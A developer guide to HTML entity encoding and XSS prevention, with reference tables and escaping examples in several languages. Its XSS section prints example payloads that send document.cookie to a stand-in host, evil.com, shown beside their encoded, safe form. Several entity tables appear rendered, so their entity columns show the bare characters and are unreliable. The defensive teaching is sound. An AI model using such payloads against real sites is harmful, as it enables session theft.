HTMLエンティティエンコーダーオンライン：HTML特殊文字の完全ガイド

becomes harmless when the < and > are encoded as < and > — the browser displays it as literal text rather than executing it as HTML. Server-side frameworks handle this automatically when using template escaping, but raw innerHTML assignments in JavaScript bypass these protections."}},{"@type":"Question","name":"What is the difference between HTML entity encoding and URL encoding?","acceptedAnswer":{"@type":"Answer","text":"HTML entity encoding converts characters using the &name; or &#code; format and is used for embedding text safely in HTML documents. URL encoding (percent encoding) converts characters using the %XX format and is used for encoding data in URIs. They serve different contexts: HTML entities go in HTML files and templates; URL encoding goes in URLs and query strings. A URL inside an HTML attribute often requires both — the URL portion is percent-encoded, and then the HTML attribute value is entity-encoded."}},{"@type":"Question","name":"Which HTML entities are required vs optional?","acceptedAnswer":{"@type":"Answer","text":"Required: & must always be encoded as & in HTML text and attribute values. < must always be encoded as < in HTML text content. In HTML attribute values delimited by double quotes, \" must be encoded as ". In HTML attribute values delimited by single quotes, apostrophes must be encoded as ' or '. Optional but recommended: > can be used literally in most HTML text contexts but encoding as > avoids edge cases. All other characters are optional — modern browsers handle the full UTF-8 character set directly, so accented letters, emoji, and symbols can be used as-is when the document declares UTF-8 charset."}}]}

TL;DR

HTML entities convert special characters (like &, <, >, ") into browser-safe representations. Always encode & as & and < as < in HTML. Use named entities for readability and numeric entities for any Unicode character. Proper encoding is the primary defense against XSS attacks. Modern UTF-8 pages can embed most characters directly, but the five HTML-special characters still require encoding. Try our free HTML Entity Encoder/Decoder →

Key Takeaways

Always encode &, <, >, ", and ' when inserting user data into HTML.
Named entities (©) are readable; numeric entities (© or ©) work for any Unicode character.
HTML entity encoding is different from URL percent-encoding — they serve different contexts.
Server-side frameworks auto-escape HTML in templates; but raw DOM innerHTML in JavaScript does not.
XSS attacks exploit unencoded HTML insertion; entity-encoding user input neutralizes them.
Modern UTF-8 documents can use accented letters and emoji directly — only the 5 HTML-special characters need encoding.
  (non-breaking space) should be used for semantic line-break prevention, not for visual spacing.

What Are HTML Entities?

An HTML entity is a special text sequence used in HTML documents to represent characters that either have a reserved meaning in HTML syntax or cannot be typed directly on a standard keyboard. Every entity begins with an ampersand (&) and ends with a semicolon (;).

HTML entities were introduced because the HTML specification originally required documents to use only the 7-bit ASCII character set, yet authors needed a way to include accented letters, currency signs, mathematical symbols, and special punctuation. Today, HTML5 documents nearly universally declare UTF-8 encoding, which means most characters can be embedded directly. However, the five characters with special HTML significance still must be encoded as entities:

&

&amp;amp;

Ampersand

<

&amp;lt;

Less-than

>

&amp;gt;

Greater-than

"

&amp;quot;

Double quote

'

&amp;apos;

Apostrophe

There are two types of HTML entities:

Named entities — use a descriptive name enclosed in & and ;. Example: © renders as ©. Only predefined characters have named entities.
Numeric entities — use the Unicode code point in decimal (©) or hexadecimal (©) form. Works for every Unicode character.

Encode or decode HTML entities instantly with our free online tool →

Essential HTML Entities Reference Table

The table below covers the most important HTML entities across several categories: security-critical characters, typography, currency, math, Greek letters, arrows, and accented Latin characters. All modern browsers support these entities.

Character	Named Entity	Numeric Entity	Description / Use Case
&	&	&	Ampersand — must always be encoded in HTML
<	<	<	Less-than sign — opens an HTML tag
>	>	>	Greater-than sign — closes an HTML tag
"	"	"	Double quote — required in attribute values
'	'	'	Single quote / apostrophe — use in attribute values
/	/	/	Solidus (forward slash)
`	&grave;	`	Backtick / grave accent
(non-break)			Non-breaking space — prevents line wrap
©	©	©	Copyright symbol
®	®	®	Registered trademark symbol
™	™	™	Trademark (unregistered)
€	€	€	Euro currency sign
£	£	£	Pound sterling
¥	¥	¥	Japanese yen
¢	¢	¢	Cent sign
–	–	–	En dash — used for ranges (2010–2020)
—	—	—	Em dash — used as a sentence break
‘	‘	‘	Left single quotation mark
’	’	’	Right single quotation mark (also apostrophe)
“	“	“	Left double quotation mark
”	”	”	Right double quotation mark
…	…	…	Horizontal ellipsis (three dots)
·	·	·	Middle dot / interpunct
°	°	°	Degree sign
±	±	±	Plus-minus sign
×	×	×	Multiplication sign
÷	÷	÷	Division sign
≠	≠	≠	Not equal to
≤	≤	≤	Less-than or equal to
≥	≥	≥	Greater-than or equal to
∞	∞	∞	Infinity symbol
∅	∅	∅	Empty set
α	α	α	Greek letter alpha
β	β	β	Greek letter beta
γ	γ	γ	Greek letter gamma
π	π	π	Greek letter pi
σ	σ	σ	Greek letter sigma
Ω	Ω	Ω	Greek capital letter omega
→	→	→	Rightwards arrow
←	←	←	Leftwards arrow
↑	↑	↑	Upwards arrow
↓	↓	↓	Downwards arrow
♥	&hearts;	♥	Black heart suit
♠	&spades;	♠	Black spade suit
♦	&diams;	♦	Black diamond suit
♣	&clubs;	♣	Black club suit
é	é	é	Latin small e with acute
à	à	à	Latin small a with grave
ü	ü	ü	Latin small u with diaeresis
ñ	ñ	ñ	Latin small n with tilde (Spanish)
ç	ç	ç	Latin small c with cedilla

Named Entities vs Numeric Entities

HTML entities come in two syntactic forms, each with distinct trade-offs. Understanding when to use each form is key to writing maintainable, portable HTML.

Named Entities

Named entities use human-readable mnemonic names. The W3C HTML5 specification defines over 2,000 named character references. They are case-sensitive:< is valid but &LT; (fully uppercase) is not defined in HTML5 (though some browsers accept it).

<!-- Named entities — readable and self-documenting -->
<p>Copyright &copy; 2025 DevToolBox &mdash; All rights reserved.</p>
<p>Price: &pound;49.99 or &euro;59.99</p>
<p>Evaluate: x &le; y &ne; z</p>
<p>Reaction: I &hearts; JavaScript</p>

Named entities are the best choice when: the entity is frequently used and recognizable, you want your HTML source to be readable without constant reference to code charts, and you are targeting modern browsers (all of them support the HTML5 named character references).

Numeric Entities — Decimal

Decimal numeric entities use the Unicode code point in base 10. Format: &#[decimal];. They work for any Unicode character, even those without named entities.

<!-- Decimal numeric entities -->
<p>Copyright &#169; 2025</p>          <!-- same as &copy; -->
<p>Trademark &#8482;</p>               <!-- &trade; -->
<p>Snowman: &#9731;</p>                <!-- no named entity! -->
<p>Musical note: &#9835;</p>           <!-- no named entity! -->
<p>Emoji-like: &#128512;</p>           <!-- U+1F600 grinning face -->

Numeric Entities — Hexadecimal

Hexadecimal numeric entities use the code point in base 16. Format: &#x[hex];. Developers who work with Unicode charts often prefer hex because Unicode values are typically specified in hex (U+00A9, U+20AC, etc.).

<!-- Hexadecimal numeric entities — map directly to Unicode code points -->
<p>Copyright &#xA9; 2025</p>           <!-- U+00A9 -->
<p>Euro sign: &#x20AC;</p>             <!-- U+20AC -->
<p>Em dash &#x2014; separates ideas</p> <!-- U+2014 -->
<p>Right arrow: &#x2192;</p>           <!-- U+2192 -->
<p>Snowflake: &#x2746;</p>             <!-- U+2746 -->

Tip: In modern UTF-8 HTML5 documents, you can use Unicode characters directly without entities (e.g., type © directly as the © character). Entities are still required for the 5 HTML-special characters and are useful when your text editor cannot handle certain character sets or when generating HTML programmatically.

When to Encode vs When Not To

Knowing exactly when HTML entity encoding is mandatory, when it is recommended, and when it is unnecessary helps you write secure, correct HTML without over-encoding.

Always Encode (Required)

These four characters MUST be encoded in all HTML content contexts:

& → & — in text content AND in attribute values
< → < — in text content (opens a tag otherwise)
> → > — in text content (recommended; technically required after ]])
" → " — when the attribute value is delimited by double quotes
' → ' or ' — when inside single-quote-delimited attributes

<!-- WRONG: unencoded ampersand breaks HTML parsing -->
<a href="https://example.com?foo=1&bar=2">Link</a>

<!-- CORRECT: encode the ampersand -->
<a href="https://example.com?foo=1&amp;bar=2">Link</a>

<!-- WRONG: unencoded < in text creates a broken tag -->
<p>if a < b then c > d</p>

<!-- CORRECT: encode angle brackets -->
<p>if a &lt; b then c &gt; d</p>

<!-- WRONG: unescaped quote terminates attribute early -->
<input value="Say "hello" to me">

<!-- CORRECT: encode the inner double quotes -->
<input value="Say &quot;hello&quot; to me">

<!-- ALTERNATIVE: use single quotes for the attribute -->
<input value='Say "hello" to me'>

Encode When Generating HTML Dynamically

Any time user-supplied text, database content, or external data is inserted into an HTML document — whether via server-side templates or client-side DOM manipulation — special characters must be entity-encoded before insertion. This is the primary XSS prevention mechanism.

<!-- If userInput = '<script>alert(1)</script>' -->

<!-- DANGEROUS — raw innerHTML injection -->
<div id="output"></div>
<script>
  document.getElementById('output').innerHTML = userInput; // XSS!
</script>

<!-- SAFE — use textContent which does NOT parse HTML -->
<script>
  document.getElementById('output').textContent = userInput; // safe
</script>

<!-- SAFE — encode before inserting as innerHTML -->
<script>
  function encodeHtml(str) {
    return str
      .replace(/&/g, '&amp;')
      .replace(/</g, '&lt;')
      .replace(/>/g, '&gt;')
      .replace(/"/g, '&quot;')
      .replace(/'/g, '&#39;');
  }
  document.getElementById('output').innerHTML = encodeHtml(userInput);
</script>

When Encoding Is Optional (UTF-8 Documents)

In modern HTML5 documents with <meta charset="UTF-8">, you can embed accented letters, currency signs, emoji, and most Unicode characters directly in your source. Using é for é or € for € is optional — the literal characters are equally valid. Encoding everything is unnecessary noise.

<!-- HTML5 UTF-8 document — these are equivalent -->
<p>Caf&eacute; au lait costs &euro;3.50</p>
<p>Café au lait costs €3.50</p>

<!-- Both render identically in all modern browsers -->
<!-- The second form is preferred in UTF-8 source files -->

Context-Specific Encoding Rules

HTML Context	Characters to Encode	Example
Text content (between tags)	& < >	<p>Tom & Jerry <3</p>
Double-quoted attribute	& < " (> optional)	<a href="x?a=1&b=2">
Single-quoted attribute	& < ' (> optional)	<img alt='Tom & Jerry'>
Unquoted attribute	& < > " ' space tab	(avoid unquoted attributes)
style attribute (CSS in HTML)	& < " in CSS strings	<div style="content: "x"">
JavaScript string in event handler	& < > " '	<div onclick="fn(&quot;x&quot;)">
URL in href/src	Percent-encode URL; then entity-encode & in HTML	<a href="/?q=a%20b&page=1">
CDATA sections	]]> must be avoided	(XML/XHTML specific)

HTML Entity Encoding vs URL Encoding

Developers often confuse HTML entity encoding and URL percent-encoding because both deal with special characters and often appear together. They are fundamentally different mechanisms for different purposes:

Property	HTML Entity Encoding	URL Percent Encoding
Format	&name; or &#code;	%XX (hex byte)
Context	HTML documents and templates	URLs, query strings, form data
Standard	HTML5 Named Character References	RFC 3986
Example: space	&#32; or &nbsp;	%20 or + (in form data)
Example: &	&amp;	%26
Example: <	&lt;	%3C
Example: ©	&copy; or &#169;	%C2%A9 (UTF-8 bytes)
Example: €	&euro; or &#8364;	%E2%82%AC (UTF-8 bytes)

A common scenario requires both types of encoding. When embedding a URL in an HTML attribute, the URL itself may contain percent-encoded characters, and the HTML attribute may also require HTML entity encoding of the ampersand in query strings:

<!-- URL with query parameters in an HTML attribute -->
<!-- Step 1: URL encode the query values -->
<!-- "hello world" -> "hello%20world" -->
<!-- Step 2: HTML entity encode the & separating parameters -->

<!-- WRONG — bare & breaks HTML validation -->
<a href="https://example.com/search?q=hello%20world&lang=en">Search</a>

<!-- CORRECT — & in HTML attribute must be &amp; -->
<a href="https://example.com/search?q=hello%20world&amp;lang=en">Search</a>

<!-- Note: URL path characters ARE percent-encoded; HTML attribute & IS entity-encoded -->
<!-- They are two separate encoding layers applied in their respective contexts -->

Use our URL Encoder tool for percent-encoding and our HTML Entity Encoder tool for HTML entity encoding — they address different encoding needs.

HTML Entity Encoding in JavaScript

JavaScript does not have a built-in HTML escape function, but there are several correct and idiomatic approaches. Choosing the right API matters for both security and correctness.

The Correct Way: textContent and DOM APIs

The safest and most straightforward method is to use the DOM APIs that automatically handle encoding for you:

// --- Safe: textContent sets plain text, no HTML parsing ---
const div = document.createElement('div');
div.textContent = '<script>alert("xss")</script>';
console.log(div.innerHTML);
// Output: &lt;script&gt;alert("xss")&lt;/script&gt;

// --- Safe: createTextNode for dynamic content ---
const textNode = document.createTextNode('Tom & Jerry <3');
document.body.appendChild(textNode);
// Renders as: Tom & Jerry <3  (no HTML interpretation)

// --- Safe: setAttribute for setting attribute values ---
const a = document.createElement('a');
a.setAttribute('title', 'Tom & Jerry <fansite>');
// Attribute is set correctly; browser handles the encoding internally

Manual Encoding Function (When innerHTML Is Required)

When you need to construct HTML strings (e.g., to set innerHTML with mixed text and markup), create a reliable encode function:

/**
 * Encode HTML special characters to prevent XSS.
 * Only encodes the 5 characters that have HTML significance.
 */
function encodeHtml(str: string): string {
  return String(str)
    .replace(/&/g, '&amp;')    // Must be FIRST — otherwise &lt; becomes &amp;lt;
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');   // Use &#39; for broader compatibility than &apos;
}

/**
 * Decode HTML entities back to plain text.
 */
function decodeHtml(html: string): string {
  const txt = document.createElement('textarea');
  txt.innerHTML = html;
  return txt.value;
}

// Usage examples:
encodeHtml('<script>alert("xss")</script>');
// => '&lt;script&gt;alert(&quot;xss&quot;)&lt;/script&gt;'

encodeHtml("Tom & Jerry's adventure");
// => 'Tom &amp; Jerry&#39;s adventure'

decodeHtml('&lt;strong&gt;Hello &amp; World&lt;/strong&gt;');
// => '<strong>Hello & World</strong>'

Using DOMParser for Safe HTML Parsing

// DOMParser: parse HTML safely and extract text
function htmlToText(html: string): string {
  const doc = new DOMParser().parseFromString(html, 'text/html');
  return doc.body.textContent ?? '';
}

htmlToText('<b>Hello</b> &amp; <i>World</i>');
// => 'Hello & World'

// Alternative with template literals and tagged templates
function safeHtml(strings: TemplateStringsArray, ...values: unknown[]): string {
  return strings.reduce((result, str, i) => {
    const value = values[i - 1];
    return result + encodeHtml(String(value ?? '')) + str;
  });
}

const username = '<script>alert(1)</script>';
const greeting = safeHtml`<p>Welcome, ${username}!</p>`;
// => '<p>Welcome, &lt;script&gt;alert(1)&lt;/script&gt;!</p>'

Libraries for HTML Encoding in JavaScript

Library	Function	Notes
he	he.encode() / he.decode()	Full HTML entity encoder/decoder — supports all named + numeric entities
entities	encodeHTML() / decodeHTML()	Lightweight; supports HTML4, HTML5, and XML entities
DOMPurify	DOMPurify.sanitize()	Full XSS sanitizer — strips dangerous tags/attributes, not just encoding
escape-html	escapeHtml(str)	Minimal 5-character encoder for security — no decoding
xss	xss(str)	Configurable whitelist-based XSS filter

// Using the 'he' library (npm install he)
import he from 'he';

he.encode('Tom & Jerry <fansite>');
// => 'Tom &amp; Jerry &lt;fansite&gt;'

he.encode('Café ©', { useNamedReferences: true });
// => 'Caf&eacute; &copy;'

he.decode('&lt;p&gt;Hello &amp; World&lt;/p&gt;');
// => '<p>Hello & World</p>'

// Using 'escape-html' (minimal, security-focused)
import escapeHtml from 'escape-html';
escapeHtml('<script>alert(1)</script>');
// => '&lt;script&gt;alert(1)&lt;/script&gt;'

HTML Entity Encoding in Python

Python ships with robust HTML encoding utilities in its standard library, making third-party dependencies unnecessary for basic use cases.

html.escape() and html.unescape()

import html

# html.escape() — encodes the 5 HTML-special characters
html.escape('<script>alert("xss")</script>')
# => '&lt;script&gt;alert(&quot;xss&quot;)&lt;/script&gt;'

html.escape('Tom & Jerry')
# => 'Tom &amp; Jerry'

# By default, quotes ARE encoded (quote=True is the default)
html.escape('"Hello World"')
# => '&quot;Hello World&quot;'

# Set quote=False to skip quote encoding (only safe for text content, not attributes!)
html.escape('"Hello"', quote=False)
# => '"Hello"'

# html.unescape() — decodes named and numeric entities
html.unescape('&lt;p&gt;Hello &amp; World&lt;/p&gt;')
# => '<p>Hello & World</p>'

html.unescape('Caf&eacute; &copy; 2025 &mdash; All rights reserved.')
# => 'Café © 2025 — All rights reserved.'

html.unescape('&#169; &#x20AC; &#9829;')
# => '© € ♥'

Python HTML Entity Encoding in Web Frameworks

# Django templates auto-escape by default
# {{ variable }} is HTML-escaped automatically
# Use {{ variable|safe }} only when you trust the content completely

from django.utils.html import escape, format_html, mark_safe

user_input = '<script>alert(1)</script>'
safe_html = escape(user_input)
# => '&lt;script&gt;alert(1)&lt;/script&gt;'

# format_html safely combines trusted HTML and escaped values
message = format_html('<p>Welcome, {}!</p>', user_input)
# => '<p>Welcome, &lt;script&gt;alert(1)&lt;/script&gt;!</p>'

# Flask/Jinja2 — auto-escapes in templates by default
from markupsafe import escape as jinja_escape, Markup

safe = jinja_escape('<b>Unsafe user input</b>')
print(safe)        # => &lt;b&gt;Unsafe user input&lt;/b&gt;
print(type(safe))  # => <class 'markupsafe.Markup'>

# Build safe HTML from trusted + untrusted parts
trusted_html = Markup('<p>Hello, {}!</p>').format('<script>xss</script>')
# => '<p>Hello, &lt;script&gt;xss&lt;/script&gt;!</p>'

Encoding All Named Entities in Python

# For full named entity encoding (e.g., © -> &copy;), use html.entities
from html.entities import codepoint2name

def encode_full_html(text: str, named: bool = True) -> str:
    """Encode all non-ASCII chars as named or numeric HTML entities."""
    result = []
    for char in html.escape(text):
        code = ord(char)
        if code > 127:
            name = codepoint2name.get(code)
            if named and name:
                result.append(f'&{name};')
            else:
                result.append(f'&#{code};')
        else:
            result.append(char)
    return ''.join(result)

encode_full_html('Café © 2025 — Cost: €49')
# => 'Caf&eacute; &copy; 2025 &mdash; Cost: &euro;49'

encode_full_html('Café © 2025', named=False)
# => 'Caf&#233; &#169; 2025'

HTML Entity Encoding in PHP

PHP provides two main functions for HTML encoding, each with important differences that affect security and character coverage.

htmlspecialchars() vs htmlentities()

<?php

// htmlspecialchars() — encodes only the 5 HTML-special characters
// This is the RECOMMENDED function for XSS prevention
$user_input = '<script>alert("XSS")</script>';
echo htmlspecialchars($user_input, ENT_QUOTES | ENT_HTML5, 'UTF-8');
// => &lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;

// Always pass ENT_QUOTES to encode both single and double quotes
// Always pass 'UTF-8' as the charset in PHP < 8.1 (default changed to UTF-8 in 8.1)

// htmlentities() — encodes ALL characters with HTML entity equivalents
// More aggressive than needed for UTF-8 documents; can cause issues
$text = 'Café © 2025 costs €49';
echo htmlentities($text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
// => Caf&eacute; &copy; 2025 costs &euro;49

// htmlspecialchars_decode() — decodes back the 5 special chars only
$encoded = '&lt;b&gt;Hello &amp; World&lt;/b&gt;';
echo htmlspecialchars_decode($encoded, ENT_QUOTES);
// => <b>Hello & World</b>

// html_entity_decode() — decodes ALL HTML entities
$encoded = 'Caf&eacute; &copy; &euro;49';
echo html_entity_decode($encoded, ENT_QUOTES | ENT_HTML5, 'UTF-8');
// => Café © €49

// strip_tags() — removes HTML tags (NOT a security substitute for encoding!)
$input = '<script>alert(1)</script><b>Bold</b>';
echo strip_tags($input);
// => Bold  (the script is removed, bold tags stripped, but NEVER rely on this for security)

?>

PHP Best Practices for HTML Encoding

PHP Security Rule: Always use htmlspecialchars($var, ENT_QUOTES | ENT_HTML5, 'UTF-8') when outputting user data in HTML. Do not rely on strip_tags() alone — it does not prevent XSS in attribute values or event handlers.

<?php
// Create a reusable helper function
function h(string $str): string {
    return htmlspecialchars($str, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Usage in HTML templates
?>
<div class="user-profile">
    <h1><?= h($user['name']) ?></h1>
    <p class="bio"><?= h($user['bio']) ?></p>
    <a href="<?= h($user['website']) ?>">
        <?= h($user['website_label']) ?>
    </a>
    <input type="text" value="<?= h($user['email']) ?>"
           placeholder="<?= h($placeholder) ?>">
</div>

<?php
// In Twig templates (Symfony, Craft CMS)
// {{ variable }} — auto-escaped in Twig (same as h())
// {{ variable|raw }} — UNSAFE, skips escaping
// {{ variable|e('html') }} — explicit HTML escaping

// In Blade templates (Laravel)
// {{ $variable }} — auto-escaped
// {!! $variable !!} — UNSAFE raw output
?>

HTML Entity Encoding in Ruby

Ruby on Rails and the CGI module provide standard tools for HTML encoding. Rack-based frameworks use the Erubi template engine which auto-escapes by default.

# Ruby standard library: CGI module
require 'cgi'

CGI.escapeHTML('<script>alert("xss")</script>')
# => "&lt;script&gt;alert(&quot;xss&quot;)&lt;/script&gt;"

CGI.escapeHTML('Tom & Jerry')
# => "Tom &amp; Jerry"

CGI.unescapeHTML('&lt;b&gt;Hello&lt;/b&gt; &amp; World &copy;')
# => "<b>Hello</b> & World ©"

# Ruby on Rails — ERB templates
# <%= variable %> — HTML-escaped automatically (calls html_escape / h)
# <%== variable %> or <%= raw variable %> — UNSAFE raw output

# Using ERB programmatically
require 'erb'
include ERB::Util

html_escape('<script>alert(1)</script>')
# => "&lt;script&gt;alert(1)&lt;/script&gt;"

h('<script>alert(1)</script>')   # h() is an alias for html_escape
# => "&lt;script&gt;alert(1)&lt;/script&gt;"

# ActiveSupport (Rails) — content_tag for safe HTML generation
# content_tag(:p, user.name)           # auto-escaped
# content_tag(:p, user.name.html_safe) # UNSAFE — use only for trusted content

# Rack::Utils
require 'rack/utils'
Rack::Utils.escape_html('Tom & Jerry <3')
# => "Tom &amp; Jerry &lt;3"

XSS Prevention with HTML Entity Encoding

Cross-Site Scripting (XSS) is one of the most prevalent web security vulnerabilities. It occurs when an attacker injects malicious scripts into web pages viewed by other users. HTML entity encoding is the primary defense, but it must be applied correctly and in the right context.

Understanding XSS Attack Vectors

XSS Attack Types:

Reflected XSS: Malicious script in the URL is reflected back in the response.
Stored XSS: Malicious script stored in the database, served to all visitors.
DOM-based XSS: Script injected via client-side DOM manipulation without server involvement.

<!-- Reflected XSS Example -->
<!-- URL: https://example.com/search?q=<script>document.location='https://evil.com?c='+document.cookie</script> -->

<!-- VULNERABLE server response -->
<p>Results for: <script>document.location='https://evil.com?c='+document.cookie</script></p>

<!-- SAFE server response (after HTML encoding the query parameter) -->
<p>Results for: &lt;script&gt;document.location=&#39;https://evil.com?c=&#39;+document.cookie&lt;/script&gt;</p>

<!-- Stored XSS Example — comment stored in database -->
<!-- Attacker comment: <img src=x onerror="fetch('https://evil.com?'+document.cookie)"> -->

<!-- VULNERABLE — displaying raw stored content -->
<div class="comment">[raw comment HTML here]</div>

<!-- SAFE — HTML-encode before rendering -->
<div class="comment">&lt;img src=x onerror=&quot;fetch(&#39;https://evil.com?&#39;+document.cookie)&quot;&gt;</div>

Context-Sensitive Escaping — Why One Encoder Is Not Enough

A critical and often misunderstood principle: HTML entity encoding alone is not sufficient for all injection contexts. Different parts of an HTML document require different escaping strategies:

Context	Required Escaping	Example
HTML body text	HTML entity encode	<p>{user_input}</p>
HTML attribute value	HTML entity encode + quote attribute	<input value="{user_input}">
JavaScript string in script tag	JavaScript string escape (\\, \", \n, etc.)	<script>var x = "{user_input}";</script>
CSS value in style tag	CSS escape	<style>color: {user_input};</style>
URL in href/src	URL encode, then HTML encode	<a href="{url_encoded_then_html_encoded}">
JSON in HTML	JSON encode + avoid </script>	<script>var data = {json_encoded};</script>

// JavaScript context inside <script> tags requires JS string escaping, NOT HTML entities
// WRONG — HTML encoding in a JS context
const name = '&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;';
// The browser HTML-decodes before parsing JS, making the injection work!

// CORRECT — JSON encode for JavaScript embedding
// In a server template (e.g., Node.js with Handlebars):
const userData = JSON.stringify({ name: userName })
  .replace(/</script>/gi, '<\/script>');  // prevents premature </script> closing

// Better: use a dedicated JSON-in-HTML serializer
// e.g., json-stringify-safe, or serialize-javascript (npm package)
import serialize from 'serialize-javascript';
const userDataStr = serialize({ name: userName }, { isJSON: true });

// CSS injection is also real — never embed user input in CSS without escaping
// WRONG:
// <div style="background-image: url({userUrl});">
// An attacker can use: ); expression(alert(1)); background:(

// SAFE: Never allow user input in CSS values; use whitelisting or data attributes instead

Content Security Policy as Defense in Depth

HTML encoding neutralizes most XSS, but a Content Security Policy (CSP) header provides a second layer of defense that limits what scripts can execute even if encoding fails:

# HTTP Response Header — strict CSP
Content-Security-Policy: default-src 'self';
  script-src 'self' 'nonce-{random-nonce-per-request}';
  style-src 'self' 'nonce-{random-nonce-per-request}';
  img-src 'self' data: https:;
  font-src 'self';
  object-src 'none';
  base-uri 'self';
  form-action 'self';
  frame-ancestors 'none';

# With nonces, only scripts with the matching nonce attribute execute:
<script nonce="rAnd0mNonce123">
  // This script is allowed by CSP
</script>

# Any injected <script> without the nonce is blocked by the browser

Defense-in-depth approach:

HTML entity encode all user-supplied data in HTML contexts (primary defense).
Use context-appropriate escaping (JS, CSS, URL) in other contexts.
Implement Content Security Policy headers (secondary defense).
Use HTTP-only cookies to limit cookie theft even if XSS occurs.
Use a well-tested sanitization library (like DOMPurify) for rich text user input.

HTML Entities in React / JSX

React automatically HTML-encodes all string values rendered via JSX expressions. This means you rarely need to manually encode entities in React applications. However, there are specific patterns for using HTML entities in JSX.

React Auto-Escaping

// React auto-escapes all JSX expressions
const userInput = '<script>alert("xss")</script>';
const Comment = () => <p>{userInput}</p>;
// Renders as: <p>&lt;script&gt;alert("xss")&lt;/script&gt;</p>
// Browser displays: <script>alert("xss")</script> (as text, not code)

// dangerouslySetInnerHTML bypasses auto-escaping — use with extreme caution
const TrustedHtml = ({ html }) => (
  <div dangerouslySetInnerHTML={{ __html: html }} />
);
// Only use when html is sanitized by DOMPurify or similar

Using HTML Entities in JSX Source Code

// In JSX string content, use HTML entity names or numeric codes
// Option 1: HTML entity name (inside JSX expressions {})
const Pricing = () => (
  <p>Price: &euro;49 &mdash; &copy; 2025</p>
);
// But &euro;, &mdash;, &copy; are resolved at HTML parsing level by the browser,
// not by React/JSX. This works because JSX compiles to HTML.

// Option 2: Unicode escape in JS string
const Pricing2 = () => (
  <p>Price: {'€'}49 {'—'} {'©'} 2025</p>
);

// Option 3: Literal Unicode characters in JSX (requires UTF-8 source file)
const Pricing3 = () => (
  <p>Price: €49 — © 2025</p>
);
// This is the cleanest approach for UTF-8 React projects

// Option 4: HTML entity codes in JSX text (NOT in expressions)
// These must be inside JSX text, not inside {}
const Arrow = () => <span>&rarr;</span>;   // renders →
const Copyright = () => <span>&copy;</span>; // renders ©

// Common JSX entity pitfall — apostrophes in text
// WRONG — JSX parser error
// const Bad = () => <p>You're welcome</p>;  // will cause linter warning

// CORRECT options:
const Good1 = () => <p>{"You're welcome"}</p>;  // string expression
const Good2 = () => <p>You&apos;re welcome</p>; // named entity
const Good3 = () => <p>You&#39;re welcome</p>;  // numeric entity
const Good4 = () => <p>You{"’"}re welcome</p>; // Unicode curly apostrophe

HTML Entities in JSX Attribute Values

// JSX attribute values are JavaScript expressions — use Unicode or strings
// NOT HTML entities in attribute values (React doesn't parse entities in attributes)

// WRONG — HTML entities in JSX attribute values are literal strings
const BadTitle = () => <div title="Tom &amp; Jerry">...</div>;
// The title will be "Tom &amp; Jerry" literally, not "Tom & Jerry"!

// CORRECT — use literal characters or Unicode in JSX attribute values
const GoodTitle1 = () => <div title="Tom & Jerry">...</div>;   // literal &
const GoodTitle2 = () => <div title={"Tom & Jerry"}>...</div>; // JS string

// For aria labels and similar attributes
const Icon = () => (
  <button aria-label="Copy to clipboard &rarr;">  {/* WRONG */}
    Copy
  </button>
);

const IconFixed = () => (
  <button aria-label="Copy to clipboard →">  {/* CORRECT */}
    Copy
  </button>
);

HTML Entities in Email, XML, and Other Contexts

HTML Entities in Email Templates

HTML email has inconsistent and often outdated rendering engines. Entity encoding is critical for email compatibility because many email clients use older HTML parsing engines.

<!-- HTML Email Best Practices for Entities -->

<!-- Always encode &, <, >, " in email HTML content -->
<p>Tom &amp; Jerry Newsletter &mdash; Issue #42</p>

<!-- Use numeric entities for special characters in email -->
<!-- Named entities like &mdash; &lsquo; &rsquo; may not be supported in all clients -->
<p>Tom &amp; Jerry Newsletter &#8212; Issue #42</p>  <!-- safer -->

<!-- Non-breaking spaces are widely supported -->
<td>100&nbsp;items</td>

<!-- Emoji in email: use UTF-8 encoding + declare in <head> -->
<!-- Some clients strip emoji; use text fallbacks -->
<p>&#127881; Happy New Year! (🎉 if supported)</p>

<!-- Copyright in email footer -->
<p>&copy; 2025 Company Name. All rights reserved.</p>
<p>&#169; 2025 Company Name. All rights reserved.</p>  <!-- numeric fallback -->

HTML Entities in XML and SVG

XML is stricter than HTML. XHTML (HTML served as XML) only supports five predefined entities by default. SVG documents embedded in HTML follow HTML entity rules; SVG as standalone XML follows XML rules.

<!-- XML predefined entities (the only 5 built-in XML entities) -->
&amp;   <!-- & -->
&lt;    <!-- < -->
&gt;    <!-- > -->
&quot;  <!-- " -->
&apos;  <!-- ' -->

<!-- In XML, other named entities like &copy; &mdash; are NOT defined! -->
<!-- You must use numeric entities or declare them in the DOCTYPE -->
<?xml version="1.0" encoding="UTF-8"?>
<document>
  <text>Copyright &#169; 2025 &#8212; All rights reserved.</text>
  <formula>x &#60; y &#38;&#38; y &#62; 0</formula>
</document>

<!-- SVG text in HTML — HTML entity rules apply -->
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="50">
  <text x="10" y="30">Tom &amp; Jerry &rarr;</text>
</svg>

<!-- SVG as standalone XML file — XML rules apply -->
<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg">
  <text>Tom &amp; Jerry &#8594;</text>  <!-- &rarr; not valid in XML! -->
</svg>

HTML Entities in CSS content Property

/* CSS content property — does NOT understand HTML entities */

/* WRONG — HTML entities do not work in CSS */
.icon::before {
  content: '&rarr;';  /* Renders literally as "&rarr;" — NOT an arrow! */
}

/* CORRECT — use Unicode escape sequences in CSS */
.icon::before {
  content: '\2192';  /* Unicode escape for → (U+2192) */
}

.copyright::after {
  content: '\00A9';  /* © copyright symbol */
}

.dash::before {
  content: '\2014 ';  /* em dash — */
}

/* Or embed the actual Unicode character directly */
.check::before {
  content: '✓';  /* Direct Unicode character — works in UTF-8 CSS files */
}

/* Common Unicode values for CSS content */
/* \201C = " left double quote    */
/* \201D = " right double quote   */
/* \2018 = ' left single quote    */
/* \2019 = ' right single quote   */
/* \2026 = … ellipsis             */
/* \00AB = « left guillemet       */
/* \00BB = » right guillemet      */

Complete HTML Special Characters by Category

Punctuation and Typography

Character	Named	Numeric	Use case
‘	‘	‘	Left single quotation mark — 'quoted'
’	’	’	Right single quotation mark / apostrophe — it's
“	“	“	"Left double quotation mark — "quoted"
”	”	”	"Right double quotation mark — "quoted"
